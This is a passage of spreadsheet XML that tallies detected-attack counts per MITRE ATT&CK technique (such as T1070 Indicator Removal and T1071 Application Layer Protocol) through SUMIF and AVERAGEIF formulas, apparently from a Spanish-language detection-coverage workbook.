        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>4</v>
      </c>
      <c r="O18" s="322" t="str">
        <f t="shared" si="1"/>
        <v>4 (14)</v>
      </c>
      <c r="P18" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>4</v>
      </c>
      <c r="Q18" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R18" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>2</v>
      </c>
      <c r="S18" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>15</v>
      </c>
      <c r="T18" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>5</v>
      </c>
      <c r="U18" s="4" t="str">
        <f t="shared" si="2"/>
        <v>5 (15)</v>
      </c>
      <c r="V18" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>5</v>
      </c>
      <c r="W18" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X18" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>2</v>
      </c>
      <c r="Y18" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>25</v>
      </c>
      <c r="Z18" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>8</v>
      </c>
      <c r="AA18" s="322" t="str">
        <f t="shared" si="3"/>
        <v>8 (25)</v>
      </c>
      <c r="AB18" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>5</v>
      </c>
      <c r="AC18" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD18" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>2</v>
      </c>
      <c r="AE18" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>52</v>
      </c>
      <c r="AF18" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>15</v>
      </c>
      <c r="AG18" s="322" t="str">
        <f t="shared" si="4"/>
        <v>15 (52)</v>
      </c>
      <c r="AH18" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>12</v>
      </c>
      <c r="AI18" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ18" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>2</v>
      </c>
      <c r="AK18" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>77</v>
      </c>
      <c r="AL18" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>23</v>
      </c>
      <c r="AM18" s="322" t="str">
        <f t="shared" si="5"/>
        <v>23 (77)</v>
      </c>
      <c r="AN18" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>19</v>
      </c>
      <c r="AO18" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP18" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>2</v>
      </c>
      <c r="AQ18" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR18" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS18" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT18" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU18" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV18" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW18" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>5</v>
      </c>
      <c r="AX18" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>3</v>
      </c>
      <c r="AY18" s="322" t="str">
        <f t="shared" si="7"/>
        <v>3 (5)</v>
      </c>
      <c r="AZ18" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>3</v>
      </c>
      <c r="BA18" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB18" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>1</v>
      </c>
      <c r="BC18" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>20</v>
      </c>
      <c r="BD18" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>8</v>
      </c>
      <c r="BE18" s="4" t="str">
        <f t="shared" si="8"/>
        <v>8 (20)</v>
      </c>
      <c r="BF18" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>8</v>
      </c>
      <c r="BG18" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH18" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>2</v>
      </c>
      <c r="BI18" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>4</v>
      </c>
      <c r="BJ18" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>3</v>
      </c>
      <c r="BK18" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (4)</v>
      </c>
      <c r="BL18" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>2</v>
      </c>
      <c r="BM18" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN18" s="394">
        <v>2</v>
      </c>
      <c r="BO18" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>6</v>
      </c>
      <c r="BP18" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>5</v>
      </c>
      <c r="BQ18" s="4" t="str">
        <f t="shared" si="10"/>
        <v>5 (6)</v>
      </c>
      <c r="BR18" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>2</v>
      </c>
      <c r="BS18" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>1</v>
      </c>
      <c r="BT18" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU18" s="394">
        <v>2</v>
      </c>
      <c r="BV18" s="292">
        <v>12</v>
      </c>
      <c r="BW18" s="322">
        <v>2</v>
      </c>
      <c r="BX18" s="4" t="str">
        <f t="shared" si="11"/>
        <v>2 (12)</v>
      </c>
      <c r="BY18" s="12">
        <v>2</v>
      </c>
      <c r="BZ18" s="13">
        <v>1</v>
      </c>
      <c r="CA18" s="394">
        <v>1</v>
      </c>
      <c r="CB18" s="288">
        <v>24</v>
      </c>
      <c r="CC18" s="4">
        <v>3</v>
      </c>
      <c r="CD18" s="4" t="str">
        <f t="shared" si="12"/>
        <v>3 (24)</v>
      </c>
      <c r="CE18" s="4">
        <v>2</v>
      </c>
      <c r="CF18" s="4">
        <v>1</v>
      </c>
      <c r="CG18" s="13">
        <v>1</v>
      </c>
      <c r="CH18" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:86" ht="15" customHeight="1">
      <c r="A19" s="4">
        <f t="shared" si="13"/>
        <v>17</v>
      </c>
      <c r="B19" s="4" t="str">
        <f>IFERROR(VLOOKUP(A19,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1070</v>
      </c>
      <c r="C19" s="493" t="str">
        <f>IFERROR(VLOOKUP(B19,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Indicator Removal</v>
      </c>
      <c r="D19" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B19)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E19" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F19" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G19" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>0</v>
      </c>
      <c r="H19" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>0</v>
      </c>
      <c r="I19" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J19" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>0</v>
      </c>
      <c r="K19" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0</v>
      </c>
      <c r="L19" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>0</v>
      </c>
      <c r="M19" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N19" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O19" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P19" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q19" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R19" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S19" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>0</v>
      </c>
      <c r="T19" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>0</v>
      </c>
      <c r="U19" s="4" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V19" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>0</v>
      </c>
      <c r="W19" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>0</v>
      </c>
      <c r="X19" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>0</v>
      </c>
      <c r="Y19" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>0</v>
      </c>
      <c r="Z19" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>0</v>
      </c>
      <c r="AA19" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB19" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>0</v>
      </c>
      <c r="AC19" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>0</v>
      </c>
      <c r="AD19" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>0</v>
      </c>
      <c r="AE19" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>11</v>
      </c>
      <c r="AF19" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>11</v>
      </c>
      <c r="AG19" s="322" t="str">
        <f t="shared" si="4"/>
        <v>11 (11)</v>
      </c>
      <c r="AH19" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>11</v>
      </c>
      <c r="AI19" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ19" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>1</v>
      </c>
      <c r="AK19" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>11</v>
      </c>
      <c r="AL19" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>11</v>
      </c>
      <c r="AM19" s="322" t="str">
        <f t="shared" si="5"/>
        <v>11 (11)</v>
      </c>
      <c r="AN19" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>11</v>
      </c>
      <c r="AO19" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP19" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>1</v>
      </c>
      <c r="AQ19" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR19" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS19" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT19" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU19" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV19" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW19" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX19" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY19" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ19" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA19" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB19" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC19" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>0</v>
      </c>
      <c r="BD19" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>0</v>
      </c>
      <c r="BE19" s="4" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF19" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>0</v>
      </c>
      <c r="BG19" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>0</v>
      </c>
      <c r="BH19" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>0</v>
      </c>
      <c r="BI19" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ19" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK19" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL19" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM19" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN19" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO19" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>5</v>
      </c>
      <c r="BP19" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>4</v>
      </c>
      <c r="BQ19" s="4" t="str">
        <f t="shared" si="10"/>
        <v>4 (5)</v>
      </c>
      <c r="BR19" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS19" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>4</v>
      </c>
      <c r="BT19" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU19" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>1</v>
      </c>
      <c r="BV19" s="292">
        <v>1</v>
      </c>
      <c r="BW19" s="322">
        <v>1</v>
      </c>
      <c r="BX19" s="4" t="str">
        <f t="shared" si="11"/>
        <v>1 (1)</v>
      </c>
      <c r="BY19" s="12">
        <v>1</v>
      </c>
      <c r="BZ19" s="13">
        <v>1</v>
      </c>
      <c r="CA19" s="394">
        <v>1</v>
      </c>
      <c r="CB19" s="288">
        <v>2</v>
      </c>
      <c r="CC19" s="4">
        <v>2</v>
      </c>
      <c r="CD19" s="4" t="str">
        <f t="shared" si="12"/>
        <v>2 (2)</v>
      </c>
      <c r="CE19" s="4">
        <v>1</v>
      </c>
      <c r="CF19" s="4">
        <v>1</v>
      </c>
      <c r="CG19" s="13">
        <v>1</v>
      </c>
      <c r="CH19" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:86" ht="15" customHeight="1">
      <c r="A20" s="4">
        <f t="shared" si="13"/>
        <v>18</v>
      </c>
      <c r="B20" s="4" t="str">
        <f>IFERROR(VLOOKUP(A20,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1071</v>
      </c>
      <c r="C20" s="493" t="str">
        <f>IFERROR(VLOOKUP(B20,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Application Layer Protocol</v>
      </c>
      <c r="D20" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B20)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E20" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>198</v>
      </c>
      <c r="F20" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (198)</v>
      </c>
      <c r="G20" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>204</v>
      </c>
      <c r="H20" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>10</v>
      </c>
      <c r="I20" s="322" t="str">
        <f t="shared" si="0"/>
        <v>10 (204)</v>
      </c>
      <c r="J20" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K20" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L20" s="394">
